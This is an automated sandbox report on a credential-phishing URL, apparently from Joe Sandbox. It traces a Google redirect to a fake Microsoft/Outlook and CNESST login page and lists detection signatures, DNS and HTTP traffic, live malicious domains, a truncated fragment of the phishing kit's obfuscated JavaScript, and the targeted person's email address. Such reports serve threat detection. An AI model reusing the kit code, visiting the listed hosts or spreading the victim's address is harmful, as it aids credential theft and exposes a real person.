Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==

Overview

General Information

Sample URL:https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am
Analysis ID:1511020
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML page contains suspicious base64 encoded javascript
Phishing site detected (based on image similarity)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6800 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1928,i,5407785022836219432,9275710607310727421,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03TLLM: Score: 8 Reasons: The domain name 'klsi.ieviatind.com' does not match the legitimate domain associated with the Outlook brand. The domain 'ieviatind' is not associated with Microsoft or Outlook, which is a strong indicator of a phishing attempt. The discrepancy between the brand name and the URL suggests that the webpage may be a fake sign-in page designed to steal user login credentials. DOM: 7.4.pages.csv
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03TLLM: Score: 8 Reasons: The domain name 'klsi.ieviatind.com' does not match the legitimate domain associated with the CNESST brand. The presence of a subdomain 'klsi' and a generic domain 'ieviatind' raises suspicions. The minimalistic design and standard login page elements do not necessarily indicate a phishing site, but the lack of a matching domain is a significant red flag. DOM: 7.5.pages.csv
Source: https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.caHTTP Parser: Base64 decoded: <script>
Source: https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.caHTTP Parser: Base64 decoded: <script>
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03TMatcher: Found strong image similarity, brand: MICROSOFT
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "y67cqree2w";var emailcheck = "ducer.kamgang@cnesst.gouv.qc.ca";var webname = "rtrim(/web8/, '/')";var urlo = "yev3kwhrcirwkeuzb52wjxxzdueas4mji1mju3rcbvp56ioj73yt9rxbmn8qz5fz4zk";var gdf = "ijm3ssamhvgas39plwqwk9quvejfcomalh5w8ugdoscd120";var odf = "ghaxcslr8zd0cw1kawsrcfmwxi9t53xlqsszilcab646";var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";let useragent = navigator.useragent;let browsername;let userip;let usercountry;var errorcodeexecuted = false;if(useragent.match(/chrome|chromium|crios/i)){ browsername = "chrome";} else if(useragent.match(/firefox|fxios/i)){ browsername = "firefox";} else if(useragent.match(/safari/i)){ browsername = "safari";} else if(useragent.match(/opr\//i)){ browsername = "opera";} else if(useragent.match(/edg/i)){ browsername = "edge";} else{ browsername="no browser detection";}function encrypt...
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: Number of links: 0
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.caHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: Title: f75TiwGQbmnbbjwy does not match URL
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: Invalid link: Terms of use
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: Invalid link: Privacy & cookies
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: Invalid link: Terms of use
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: Invalid link: Privacy & cookies
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: <input type="password" .../> found
Source: https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.caHTTP Parser: No favicon
Source: https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.caHTTP Parser: No favicon
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: No favicon
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: No favicon
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: No <meta name="author".. found
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: No <meta name="author".. found
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: No <meta name="copyright".. found
Source: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03THTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49856 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: global trafficHTTP traffic detected: GET /skoda/WIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== HTTP/1.1Host: keyconserv.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: keyconserv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://keyconserv.com/skoda/WIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: keyconserv.com
Source: global trafficDNS traffic detected: DNS query: klsi.ieviatind.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: get.geojs.io
Source: global trafficDNS traffic detected: DNS query: 5v0.philmotig.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
Source: global trafficDNS traffic detected: DNS query: apis.google.com
Source: global trafficDNS traffic detected: DNS query: play.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 19:42:20 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
